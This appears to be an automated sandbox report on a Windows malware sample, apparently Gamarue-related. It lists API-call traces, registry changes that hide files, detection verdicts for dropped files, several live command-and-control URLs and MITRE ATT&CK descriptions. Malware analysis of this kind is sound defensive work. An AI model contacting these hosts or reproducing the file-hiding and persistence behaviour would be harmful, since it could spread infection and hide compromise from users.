Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,00008000,00001000,00000004), ref: 00022623
ExpandEnvironmentStringsW.KERNEL32(%allusersprofile%,00022DA8,00008000,00000000,00008000,00001000,00000004), ref: 00022640
SetCurrentDirectoryW.KERNEL32(00022DA8,%allusersprofile%,00022DA8,00008000,00000000,00008000,00001000,00000004), ref: 00022648
lstrcpy.KERNEL32(00022DA8,software\microsoft), ref: 00022657
RegOpenKeyExA.ADVAPI32(00022DA8,00000000,0002001F,?,00022DA8,software\microsoft,00022DA8,%allusersprofile%,00022DA8,00008000,00000000,00008000,00001000,00000004), ref: 00022670
RegEnumValueW.ADVAPI32(?,00000000,?,0000001F,00000000,00000000,00000000,00000000,00022DA8,00000000,0002001F,?,00022DA8,software\microsoft,00022DA8,%allusersprofile%), ref: 0002269F
GetModuleHandleW.KERNEL32(?,?,00000000,?,0000001F,00000000,00000000,00000000,00000000,?,00000000,?,0000001F,00000000,00000000,00000000), ref: 000226B9
FreeLibrary.KERNEL32(00000000,?,?,00000000,?,0000001F,00000000,00000000,00000000,00000000,?,00000000,?,0000001F,00000000,00000000), ref: 000226C3
DeleteFileW.KERNEL32(?,?,?,00000000,?,0000001F,00000000,00000000,00000000,00000000,?,00000000,?,0000001F,00000000,00000000), ref: 000226CC
RegDeleteValueW.ADVAPI32(?,?,?,?,?,00000000,?,0000001F,00000000,00000000,00000000,00000000,?,00000000,?,0000001F), ref: 000226D8
RegCloseKey.ADVAPI32(?,?,00000000,?,0000001F,00000000,00000000,00000000,00000000,00022DA8,00000000,0002001F,?,00022DA8,software\microsoft,00022DA8), ref: 000226E9
GetSystemDirectoryW.KERNEL32(00022DA8,00008000), ref: 000226FD
SetCurrentDirectoryW.KERNEL32(00022DA8,00022DA8,00008000,00022DA8,00000000,0002001F,?,00022DA8,software\microsoft,00022DA8,%allusersprofile%,00022DA8,00008000,00000000,00008000,00001000), ref: 00022705
VirtualFree.KERNEL32(00022DA8,00000000,00008000,00022DA8,00022DA8,00008000,00022DA8,00000000,0002001F,?,00022DA8,software\microsoft,00022DA8,%allusersprofile%,00022DA8,00008000), ref: 00022714

Strings

%allusersprofile%, xrefs: 0002263B
software\microsoft, xrefs: 0002264D, 00022653

Memory Dump Source

Source File: 00000009.00000002.381446071.0000000000020000.00000040.00001000.00020000.00000000.sdmp, Offset: 00020000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_20000_svchost.jbxd

Similarity

API ID: Directory$CurrentDeleteFreeValueVirtual$AllocCloseEnumEnvironmentExpandFileHandleLibraryModuleOpenStringsSystemlstrcpy
String ID: %allusersprofile%$software\microsoft
API String ID: 3835630320-3330974064
Opcode ID: a9d667bc77a146274c428bcacb8782486d52b11106f23bbb5924c04426bdb8c7
Instruction ID: 216f85cd24a5a054f3c930f3d83a650878cc10b388fc99c524ffcbb043796af3
Opcode Fuzzy Hash: a9d667bc77a146274c428bcacb8782486d52b11106f23bbb5924c04426bdb8c7
Instruction Fuzzy Hash: CD31EE7194022DBAEF61EBD0EE86FEEB7B9BF04704F200471B610B50E2DB759A549B14

Uniqueness

Uniqueness Score: -1.00%

Function 001E12E0 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 71registrylibraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32,IsWow64Process), ref: 001E12F7
GetProcAddress.KERNEL32(00000000), ref: 001E12FE
GetCurrentProcess.KERNEL32(00000000), ref: 001E1311
RegOpenKeyExW.ADVAPI32 ref: 001E1344
RegSetValueExW.ADVAPI32 ref: 001E1372
RegSetValueExW.ADVAPI32 ref: 001E1387
RegCloseKey.ADVAPI32(001E11BC), ref: 001E138D
SendMessageW.USER32(0000FFFF,00000111,00007103,00000000), ref: 001E13A4
SHChangeNotify.SHELL32(08000000,00000000,00000000,00000000), ref: 001E13B5

Strings

IsWow64Process, xrefs: 001E12E6
kernel32, xrefs: 001E12EB
Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced, xrefs: 001E133A
ShowSuperHidden, xrefs: 001E1365
Hidden, xrefs: 001E1381

Memory Dump Source

Source File: 00000009.00000002.381475492.00000000001E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000009.00000002.381475492.00000000001F1000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1e0000_svchost.jbxd

Similarity

API ID: Value$AddressChangeCloseCurrentHandleMessageModuleNotifyOpenProcProcessSend
String ID: Hidden$IsWow64Process$ShowSuperHidden$Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced$kernel32
API String ID: 382038999-650040310
Opcode ID: 6a2e2bbc82746c950bfe34099b7036c3e933afe439e958edbac9866195426133
Instruction ID: d8aa73289f7e9e3324cfba329b08d3d783e8ddafd7288b93a0b4c7d869f3d191
Opcode Fuzzy Hash: 6a2e2bbc82746c950bfe34099b7036c3e933afe439e958edbac9866195426133
Instruction Fuzzy Hash: 13216D75B80388BBEB20DBE5DD8AF9D777CAB04B11F600459B701AA5C0D7F06A84CB55

Uniqueness

Uniqueness Score: -1.00%

Function 001E179E Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 123filestringCOMMON

Download Yara Rule

APIs

wsprintfW.USER32 ref: 001E1844
wsprintfW.USER32 ref: 001E1859
wsprintfW.USER32 ref: 001E187B
DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,001E121A), ref: 001E1887
SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,?,?,?,?,?,?,?,?,001E121A), ref: 001E1899
DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,001E121A), ref: 001E18A6
wsprintfW.USER32 ref: 001E1930
DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,001E121A), ref: 001E193C
SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,?,?,?,001E121A), ref: 001E194E
DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,001E121A), ref: 001E195B
lstrcmpiW.KERNEL32(?,.LNK,?,?,?,?,001E121A), ref: 001E1988
wsprintfW.USER32 ref: 001E19A8
DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,001E121A), ref: 001E19B4
SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,?,?,?,001E121A), ref: 001E19C6
DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,001E121A), ref: 001E19D3
lstrcmpiW.KERNEL32(?,.INF,?,?,?,?,001E121A), ref: 001E19FC
lstrcmpiW.KERNEL32(?,.INI,?,?,?,?,001E121A), ref: 001E1A2C
wsprintfW.USER32 ref: 001E1A8A
DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,001E121A), ref: 001E1A96
SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,?,?,?,001E121A), ref: 001E1AAC
DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,001E121A), ref: 001E1AB9
wsprintfW.USER32 ref: 001E1B19
SetFileAttributesW.KERNEL32(?,00000006,?,?,?,?,?,?,?,?,001E121A), ref: 001E1B27
FindNextFileW.KERNEL32(?,?,?,001E121A), ref: 001E1B3B
FindClose.KERNEL32(?,?,?,?,?,?,?,?,?,001E121A), ref: 001E1B4A

Strings

%s.exe, xrefs: 001E1853
%s%s, xrefs: 001E1875
%s\%s, xrefs: 001E183E

Memory Dump Source

Source File: 00000009.00000002.381475492.00000000001E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000009.00000002.381475492.00000000001F1000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1e0000_svchost.jbxd

Similarity

API ID: File$Delete$wsprintf$Attributes$lstrcmpi$Find$CloseNext
String ID: %s%s$%s.exe$%s\%s
API String ID: 1943899752-352409262
Opcode ID: c06b870d34b259d5ec8c832cc323e1964a9c3f665609999970a34330b140c2ae
Instruction ID: 7338fc12e7afa52b59e17137bf6f5f220e8634f06bed42808c3723b7771d96d7
Opcode Fuzzy Hash: c06b870d34b259d5ec8c832cc323e1964a9c3f665609999970a34330b140c2ae
Instruction Fuzzy Hash: 19411772D00A99B6DB24ABA2CC45BEE7379FF24744F854095D90AA7100F732DEC9CB50

Uniqueness

Uniqueness Score: -1.00%

Function 001E2C20 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 113comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 001E2C28
CoCreateInstance.OLE32(001E922C,00000000,00000001,001E921C,?), ref: 001E2C48
CoUninitialize.OLE32 ref: 001E2CFA
CoUninitialize.OLE32 ref: 001E2D28

Strings

rundll32, xrefs: 001E2C5E, 001E2C70
shell32.dll, xrefs: 001E2CA9

Memory Dump Source

Source File: 00000009.00000002.381475492.00000000001E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000009.00000002.381475492.00000000001F1000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1e0000_svchost.jbxd

Similarity

API ID: Uninitialize$CreateInitializeInstance
String ID: rundll32$shell32.dll
API String ID: 1968832861-599609437
Opcode ID: 65bb4fce0c7e3338dbc9d5c83469f725f212812a6d4ed0e6bec0c7fa1e7c59be
Instruction ID: 51d21a5a23f6e83a5c22249d9df92a206a07311a6179bc64b7d117a9608aec5f
Opcode Fuzzy Hash: 65bb4fce0c7e3338dbc9d5c83469f725f212812a6d4ed0e6bec0c7fa1e7c59be
Instruction Fuzzy Hash: B241B779740604AFDB00EBA9CC85F5EB3B9AF8D704F208584EA09DB3A5D675ED02DB50

Uniqueness

Uniqueness Score: -1.00%

Function 00021E72 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 43registryCOMMON

Download Yara Rule

APIs

RegCreateKeyExA.ADVAPI32(software\microsoft,00000000,00000000,00000000,00020006,00000000,?,00000000,00000004), ref: 00021E94
wsprintfW.USER32 ref: 00021EAC
RegSetValueExW.ADVAPI32(?,00000004,00000000,00000003,?,?,?,00000000,00000004), ref: 00021EC9
RegCloseKey.ADVAPI32(?,?,00000004,00000000,00000003,?,?,?,00000000,00000004), ref: 00021ED1

Strings

%08X, xrefs: 00021EA3
software\microsoft, xrefs: 00021E89

Memory Dump Source

Source File: 00000009.00000002.381446071.0000000000020000.00000040.00001000.00020000.00000000.sdmp, Offset: 00020000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_20000_svchost.jbxd

Similarity

API ID: CloseCreateValuewsprintf
String ID: %08X$software\microsoft
API String ID: 4211343355-153170398
Opcode ID: 06e26063515e8221a9a461022c38cc6d44f0f697e1f06d1329ee02f2536c984c
Instruction ID: 9f197e028462865b8a6f20695c78ae5a1ed8b6f537ff0be786811003c0aea341
Opcode Fuzzy Hash: 06e26063515e8221a9a461022c38cc6d44f0f697e1f06d1329ee02f2536c984c
Instruction Fuzzy Hash: 4CF0A472510218BFEF14EB90EC97EEF776DEB14700F100124BA0199092F6A6EF109770

Uniqueness

Uniqueness Score: -1.00%

Function 001E4149 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,001EB1A0,00000008,001E4251,00000000,00000000,?,001E4AD9,00000000,00000001,00000000,?,001E6706,00000018,001EB230,0000000C), ref: 001E415A
__lock.LIBCMT ref: 001E418E

Part of subcall function 001E677B: __mtinitlocknum.LIBCMT ref: 001E6791
Part of subcall function 001E677B: __amsg_exit.LIBCMT ref: 001E679D
Part of subcall function 001E677B: EnterCriticalSection.KERNEL32(00000000,00000000,?,001E4321,0000000D,001EB1C8,00000008,001E4418,00000000,?,001E3259,00000000,001EB100,00000008,001E32BE,?), ref: 001E67A5

InterlockedIncrement.KERNEL32(?), ref: 001E419B
__lock.LIBCMT ref: 001E41AF
___addlocaleref.LIBCMT ref: 001E41CD

Strings

KERNEL32.DLL, xrefs: 001E4155

Memory Dump Source

Source File: 00000009.00000002.381475492.00000000001E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000009.00000002.381475492.00000000001F1000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1e0000_svchost.jbxd

Similarity

API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
String ID: KERNEL32.DLL
API String ID: 637971194-2576044830
Opcode ID: 7746abcb76655ebcaef7616bc7aa8dce58e8a96c7b73cfe04d29033e8195d8b6
Instruction ID: 1db759abc6b6338815a2828e5a7979294e97a54e3f694cf5cf838b4d0a7e5d22
Opcode Fuzzy Hash: 7746abcb76655ebcaef7616bc7aa8dce58e8a96c7b73cfe04d29033e8195d8b6
Instruction Fuzzy Hash: EF015BB1841F809FDB209FA6D84670EFBF0AF20725F50890EE495966A1CBB4A685CF11

Uniqueness

Uniqueness Score: -1.00%

Function 001E38CC Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 001E38D8

Part of subcall function 001E4276: __getptd_noexit.LIBCMT ref: 001E4279
Part of subcall function 001E4276: __amsg_exit.LIBCMT ref: 001E4286

__amsg_exit.LIBCMT ref: 001E38F8
__lock.LIBCMT ref: 001E3908
InterlockedDecrement.KERNEL32(?), ref: 001E3925
_free.LIBCMT ref: 001E3938
InterlockedIncrement.KERNEL32(002317A8), ref: 001E3950

Memory Dump Source

Source File: 00000009.00000002.381475492.00000000001E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000009.00000002.381475492.00000000001F1000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1e0000_svchost.jbxd

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
String ID:
API String ID: 3470314060-0
Opcode ID: 486543b36bc22eefedf567bf4d430d0573bcb597a3cf54fc02cedf25875093f5
Instruction ID: 33ff777d50cc44d80b01616e59ee755baaa719c371358c53d7db84180f9ec449
Opcode Fuzzy Hash: 486543b36bc22eefedf567bf4d430d0573bcb597a3cf54fc02cedf25875093f5
Instruction Fuzzy Hash: 3301C432D01FD5ABCB10ABAB984A75DB760BF10B25F050109F43067691C7746E81CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 001E734C Relevance: 7.6, APIs: 5, Instructions: 68COMMONLIBRARYCODE

Download Yara Rule

APIs

_malloc.LIBCMT ref: 001E735A

Part of subcall function 001E7287: __FF_MSGBANNER.LIBCMT ref: 001E72A0
Part of subcall function 001E7287: __NMSG_WRITE.LIBCMT ref: 001E72A7
Part of subcall function 001E7287: HeapAlloc.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,001E4AD9,00000000,00000001,00000000,?,001E6706,00000018,001EB230,0000000C,001E6796), ref: 001E72CC

_free.LIBCMT ref: 001E736D

Memory Dump Source

Source File: 00000009.00000002.381475492.00000000001E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000009.00000002.381475492.00000000001F1000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1e0000_svchost.jbxd

Similarity

API ID: AllocHeap_free_malloc
String ID:
API String ID: 2734353464-0
Opcode ID: e6de9716df1e0b37407583ae372057fb759d0f9f2c86f7cc6cad2e6402d979b8
Instruction ID: e3e9cbfc708d4195514446bea7eb58fddb85f831e16d843f23887d7560249a17
Opcode Fuzzy Hash: e6de9716df1e0b37407583ae372057fb759d0f9f2c86f7cc6cad2e6402d979b8
Instruction Fuzzy Hash: 6B11E732408DD5ABEF652BB7AC0565E3794BF643B0F210125FD598B2D1DF34C980A790

Uniqueness

Uniqueness Score: -1.00%

Function 001E404D Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 001E4059

Part of subcall function 001E4276: __getptd_noexit.LIBCMT ref: 001E4279
Part of subcall function 001E4276: __amsg_exit.LIBCMT ref: 001E4286

__getptd.LIBCMT ref: 001E4070
__amsg_exit.LIBCMT ref: 001E407E
__lock.LIBCMT ref: 001E408E
__updatetlocinfoEx_nolock.LIBCMT ref: 001E40A2

Memory Dump Source

Source File: 00000009.00000002.381475492.00000000001E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000009.00000002.381475492.00000000001F1000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1e0000_svchost.jbxd

Similarity

API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
String ID:
API String ID: 938513278-0
Opcode ID: fde637bdd93494da09048d9a06ae38b967bd6016be1deaad6758eb8f1b0a905d
Instruction ID: b5ff607f47080a3e03797e4725816546e035de8dfef3f44677289c0f7367d5b6
Opcode Fuzzy Hash: fde637bdd93494da09048d9a06ae38b967bd6016be1deaad6758eb8f1b0a905d
Instruction Fuzzy Hash: 87F02432904FC0DBEB20FFEBA907B8D73A16F14B24F104118F200AB1D2CB6408408B56

Uniqueness

Uniqueness Score: -1.00%

Function 001E7120 Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 001E7154
__isleadbyte_l.LIBCMT ref: 001E7187
MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?), ref: 001E71B8
MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?), ref: 001E7226

Memory Dump Source

Source File: 00000009.00000002.381475492.00000000001E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000009.00000002.381475492.00000000001F1000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1e0000_svchost.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 81de882e6cf616d074a8c7332f2c520cb974c171469d8ec289cfeae5a39096df
Instruction ID: fbaaf592c968a9b0b15d766c9478079cc8ca361372cf837c4cf5e4f53b433339
Opcode Fuzzy Hash: 81de882e6cf616d074a8c7332f2c520cb974c171469d8ec289cfeae5a39096df
Instruction Fuzzy Hash: 8F319C31A087D6EFEB25DFA6CC80AAE7BA5AF01311B1585A9F4658B1D1E330DD80DB50

Uniqueness

Uniqueness Score: -1.00%

Function 001E13C0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45COMMON

Download Yara Rule

APIs

_calloc.LIBCMT ref: 001E13CE

Strings

http://pe.suckmycocklameavindustry.in/, xrefs: 001E13C4
abcdefghijklmnopqrstuvxyz, xrefs: 001E13E2

Memory Dump Source

Source File: 00000009.00000002.381475492.00000000001E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000009.00000002.381475492.00000000001F1000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1e0000_svchost.jbxd

Similarity

API ID: _calloc
String ID: abcdefghijklmnopqrstuvxyz$http://pe.suckmycocklameavindustry.in/
API String ID: 1679841372-1691302648
Opcode ID: 01c4f663d4c9ceca0071b1a52a98fbe1061ffbd34a98480adcae7b58f56183e8
Instruction ID: 8aa4299f828c6b89c4b0268dac7bc3bd29efec4d9c6176f27cd6deee8c6d571c
Opcode Fuzzy Hash: 01c4f663d4c9ceca0071b1a52a98fbe1061ffbd34a98480adcae7b58f56183e8
Instruction Fuzzy Hash: 32F0FC36700A55678720975EEC01ADF73DAEBC4371B044166ED49C7700F7719D1083D0

Uniqueness

Uniqueness Score: -1.00%

Source: http://orzdwjtvmein.in/in.php	Avira URL Cloud: Label: malware
Source: http://bdcrqgonzmwuehky.nl/in.php	Avira URL Cloud: Label: malware
Source: http://somicrososoft.ru/in.php	Avira URL Cloud: Label: malware
Source: http://xdqzpbcgrvkj.ru/in.php	Avira URL Cloud: Label: malware
Source: http://anam0rph.su/in.php	Avira URL Cloud: Label: malware
Source: http://xdqzpbcgrvkj.ru/in.phphttp://anam0rph.su/in.phphttp://orzdwjtvmein.in/in.phphttp://ygiudewsqh	Avira URL Cloud: Label: malware
Source: http://ygiudewsqhct.in/in.php	Avira URL Cloud: Label: malware

Source: xdqzpbcgrvkj.ru	Virustotal: Detection: 18%	Perma Link
Source: http://orzdwjtvmein.in/in.php	Virustotal: Detection: 11%	Perma Link
Source: http://pe.suckmycocklameavindustry.in/	Virustotal: Detection: 6%	Perma Link
Source: anam0rph.su	Virustotal: Detection: 11%	Perma Link
Source: http://bdcrqgonzmwuehky.nl/in.php	Virustotal: Detection: 11%	Perma Link
Source: http://somicrososoft.ru/in.php	Virustotal: Detection: 14%	Perma Link
Source: pe.suckmycocklameavindustry.in	Virustotal: Detection: 6%	Perma Link
Source: http://anam0rph.su/in.php	Virustotal: Detection: 13%	Perma Link
Source: http://xdqzpbcgrvkj.ru/in.phphttp://anam0rph.su/in.phphttp://orzdwjtvmein.in/in.phphttp://ygiudewsqh	Virustotal: Detection: 14%	Perma Link
Source: http://ygiudewsqhct.in/in.php	Virustotal: Detection: 13%	Perma Link
Source: http://xdqzpbcgrvkj.ru/in.php	Virustotal: Detection: 16%	Perma Link
Source: http://sc.suckmycocklameavindustry.in/	Virustotal: Detection: 6%	Perma Link

Source: C:\Users\user\AppData\Local\Temp\Gozekeneka.dll	Avira: detection malicious, Label: HEUR/AGEN.1358866
Source: C:\Users\user\AppData\Local\Temp\0BBFF.tmp	Avira: detection malicious, Label: TR/AD.Gamarue.njjtd
Source: C:\Users\user\AppData\Local\Temp\xuxokuxoka.dll	Avira: detection malicious, Label: TR/Symmi.17001.30
Source: C:\Users\user\AppData\Local\Temp\naseropuxeq.dll	Avira: detection malicious, Label: TR/Graftor.75972.7
Source: C:\Users\user\AppData\Local\Temp\yiduyevutog.dll	Avira: detection malicious, Label: TR/Symmi.17001.22
Source: C:\Users\user\AppData\Local\Temp\Lohonibuhod.exe	Avira: detection malicious, Label: TR/Agent.hwpf
Source: C:\Users\user\AppData\Local\Temp\natigezeholi.dll	Avira: detection malicious, Label: HEUR/AGEN.1328724
Source: C:\ProgramData\Local Settings\Temp\msoiruj.bat	Avira: detection malicious, Label: TR/AD.Gamarue.djauj
Source: C:\Users\user\AppData\Local\Temp\Sahofivizu.exe	Avira: detection malicious, Label: HEUR/AGEN.1344339
Source: C:\Users\user\AppData\Local\Temp\Jahulocayedo.dll	Avira: detection malicious, Label: TR/Symmi.17001.23
Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe	Avira: detection malicious, Label: TR/AD.Gamarue.djauj
Source: C:\Users\user\AppData\Local\Temp\Zojemilocan.dll	Avira: detection malicious, Label: HEUR/AGEN.1322941

Source: C:\ProgramData\Local Settings\Temp\msoiruj.bat	ReversingLabs: Detection: 86%
Source: C:\ProgramData\Local Settings\Temp\msoiruj.bat	Virustotal: Detection: 84%	Perma Link
Source: C:\Users\user\AppData\Local\Temp\0BBFF.tmp	ReversingLabs: Detection: 95%
Source: C:\Users\user\AppData\Local\Temp\0BBFF.tmp	Virustotal: Detection: 81%	Perma Link
Source: C:\Users\user\AppData\Local\Temp\Firozedikami.dll	ReversingLabs: Detection: 59%
Source: C:\Users\user\AppData\Local\Temp\Firozedikami.dll	Virustotal: Detection: 59%	Perma Link
Source: C:\Users\user\AppData\Local\Temp\Gozekeneka.dll	ReversingLabs: Detection: 76%
Source: C:\Users\user\AppData\Local\Temp\Gozekeneka.dll	Virustotal: Detection: 75%	Perma Link
Source: C:\Users\user\AppData\Local\Temp\Jahulocayedo.dll	ReversingLabs: Detection: 70%
Source: C:\Users\user\AppData\Local\Temp\Jahulocayedo.dll	Virustotal: Detection: 65%	Perma Link
Source: C:\Users\user\AppData\Local\Temp\Lohonibuhod.exe	ReversingLabs: Detection: 75%
Source: C:\Users\user\AppData\Local\Temp\Lohonibuhod.exe	Virustotal: Detection: 77%	Perma Link
Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe	ReversingLabs: Detection: 86%
Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe	Virustotal: Detection: 84%	Perma Link
Source: C:\Users\user\AppData\Local\Temp\Sahofivizu.exe	ReversingLabs: Detection: 56%
Source: C:\Users\user\AppData\Local\Temp\Sahofivizu.exe	Virustotal: Detection: 60%	Perma Link
Source: C:\Users\user\AppData\Local\Temp\Zojemilocan.dll	ReversingLabs: Detection: 64%
Source: C:\Users\user\AppData\Local\Temp\Zojemilocan.dll	Virustotal: Detection: 74%	Perma Link
Source: C:\Users\user\AppData\Local\Temp\naseropuxeq.dll	ReversingLabs: Detection: 59%
Source: C:\Users\user\AppData\Local\Temp\naseropuxeq.dll	Virustotal: Detection: 71%	Perma Link
Source: C:\Users\user\AppData\Local\Temp\natigezeholi.dll	ReversingLabs: Detection: 78%
Source: C:\Users\user\AppData\Local\Temp\natigezeholi.dll	Virustotal: Detection: 75%	Perma Link
Source: C:\Users\user\AppData\Local\Temp\xuxokuxoka.dll	ReversingLabs: Detection: 66%
Source: C:\Users\user\AppData\Local\Temp\xuxokuxoka.dll	Virustotal: Detection: 67%	Perma Link
Source: C:\Users\user\AppData\Local\Temp\yiduyevutog.dll	ReversingLabs: Detection: 70%
Source: C:\Users\user\AppData\Local\Temp\yiduyevutog.dll	Virustotal: Detection: 72%	Perma Link

Source: C:\ProgramData\Local Settings\Temp\msoiruj.bat	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe	Joe Sandbox ML: detected

Source: C:\Users\user\Desktop\Hu25VEa8Dr.exe	Code function: 3_2_00402493 PathCombineA,CryptAcquireContextA,CryptAcquireContextA,CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptDeriveKey,CryptDecrypt,		3_2_00402493
Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe	Code function: 7_2_00402493 PathCombineA,CryptAcquireContextA,CryptAcquireContextA,CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptDeriveKey,CryptDecrypt,		7_2_00402493

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

